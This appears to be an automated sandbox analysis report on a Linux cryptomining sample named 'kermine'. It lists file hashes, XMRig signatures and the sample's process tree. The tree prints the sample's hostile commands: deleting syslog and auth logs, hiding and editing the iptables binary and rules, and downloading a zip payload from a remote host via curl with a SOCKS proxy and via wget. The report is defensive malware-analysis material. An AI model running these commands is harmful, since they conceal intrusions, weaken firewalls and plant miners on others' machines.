Resubmissions
21-10-2024 12:12
241021-pdcl5stbje 1021-10-2024 11:59
241021-n55xbsshjb 1019-10-2024 11:43
241019-nvrlyswdrn 1019-10-2024 03:15
241019-drzs2swcrr 1019-10-2024 03:03
241019-dj7tpavhrp 1018-10-2024 09:09
241018-k4fdhaycqc 10Analysis
-
max time kernel
599s -
max time network
517s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
19-10-2024 03:03
Behavioral task
behavioral1
Sample
kermine
Resource
ubuntu1804-amd64-20240611-en
General
-
Target
kermine
-
Size
1.3MB
-
MD5
13d1ec32d39153bddcb677fc491d90f8
-
SHA1
28f07354c83098f3f2f988249251096bcdf68549
-
SHA256
7f2b4e30c6ae7c56c0bc861f920bca6b52183b3e8bc30347739c6591bdfaa589
-
SHA512
1dbcab16cb408f8c895609af43f973c09b4c0dda5da1f36e2524823b53874cdce585bf4d4d489f9323043f69d688cf3375ad14036e99f0b09c6bdfddf66289b4
-
SSDEEP
24576:87U+XfGMTwJ7RBNytH9wiPGKgIxECVVXZSELt:8g+XfjU7RBNC9wiPGKgIxE8VwE
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
rmdescription ioc Process File deleted /var/log/syslog rm -
Processes:
rmrmrmdescription ioc Process File deleted /var/log/messages* rm File deleted /var/log/secure* rm File deleted /var/log/auth.log rm -
Processes:
awkxargsawkmvmkdirxargsawkxargsawkxargsxargsawkmvawkawkawkstatmvxargsxargsawkxargsxargsmvdescription ioc Process File opened for reading /proc/self/maps awk File opened for reading /proc/self/fd xargs File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mkdir File opened for reading /proc/self/fd xargs File opened for reading /proc/self/maps awk File opened for reading /proc/self/fd xargs File opened for reading /proc/self/maps awk File opened for reading /proc/self/fd xargs File opened for reading /proc/self/fd xargs File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems mv File opened for reading /proc/self/maps awk File opened for reading /proc/self/maps awk File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems stat File opened for reading /proc/filesystems mv File opened for reading /proc/self/fd xargs File opened for reading /proc/self/fd xargs File opened for reading /proc/self/maps awk File opened for reading /proc/self/fd xargs File opened for reading /proc/self/fd xargs File opened for reading /proc/filesystems mv -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
mvmvcurlrmcurlmvmvstatrmwgetpid Process 1513 mv 1557 mv 1565 curl 2014 rm 2015 curl 1512 mv 1558 mv 2008 stat 2009 rm 2010 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetdescription ioc Process File opened for modification /tmp/pn.zip wget
Processes
-
/tmp/kermine/tmp/kermine1⤵PID:1502
-
/bin/bash/bin/bash /dev/fd/31⤵PID:1502
-
/bin/rmrm -rf /var/www/html/config.json2⤵PID:1504
-
-
/bin/rmrm -rf /root/.xmrig.json2⤵PID:1505
-
-
/bin/rmrm -rf /root/.config/xmrig.json2⤵PID:1506
-
-
/bin/rmrm -rf "/var/log/messages*"2⤵
- Deletes log files
PID:1507
-
-
/bin/rmrm -rf "/var/log/secure*"2⤵
- Deletes log files
PID:1508
-
-
/bin/rmrm -rf /var/log/auth.log2⤵
- Deletes log files
PID:1509
-
-
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1510
-
-
/sbin/sysctlsysctl -p2⤵PID:1511
-
-
/bin/sleepsleep 12⤵PID:1514
-
-
/bin/mvmv /sbin/tokens /sbin/iptables2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1513
-
-
/bin/mvmv /usr/sbin/tokens /usr/sbin/iptables2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1512
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1522
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1521
-
-
/bin/grepgrep 138.682⤵PID:1520
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1519
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1528
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1527
-
-
/bin/grepgrep 67.2072⤵PID:1526
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1525
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1532
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1531
-
-
/bin/grepgrep 46.1012⤵PID:1530
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1529
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1536
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1535
-
-
/bin/grepgrep 157.2452⤵PID:1534
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1533
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1540
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1539
-
-
/bin/grepgrep 146.1902⤵PID:1538
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1537
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1544
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1543
-
-
/bin/grepgrep 144.1262⤵PID:1542
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1541
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1548
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1547
-
-
/bin/grepgrep 167.1722⤵PID:1546
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1545
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1552
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1551
-
-
/bin/grepgrep 172.1042⤵PID:1550
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1549
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1556
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1555
-
-
/bin/grepgrep 172.1052⤵PID:1554
-
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1553
-
-
/bin/mvmv /sbin/iptables /sbin/tokens2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1558
-
-
/bin/mvmv /usr/sbin/iptables /usr/sbin/tokens2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1557
-
-
/bin/mkdirmkdir /etc/ad12e85f2⤵
- Reads runtime system information
PID:1559
-
-
/usr/bin/headhead -c 82⤵PID:1563
-
-
/usr/bin/md5summd5sum2⤵PID:1562
-
-
/bin/catcat /usr/share/dbus-1/interfaces.conf2⤵PID:1564
-
-
/usr/bin/curlcurl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :9090 http://example.established.site/pn.zip2⤵
- System Network Configuration Discovery
PID:1565
-
-
/usr/bin/statstat "-c%s" /tmp/pn.zip2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:2008
-
-
/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:2009
-
-
/usr/bin/wgetwget "--timeout=5" "--tries=2" http://example.established.site/pn.zip -q -O /tmp/pn.zip2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:2010
-
-
/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:2014
-
-
/usr/bin/curlcurl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :1081 http://example.established.site/pn.zip2⤵
- System Network Configuration Discovery
PID:2015
-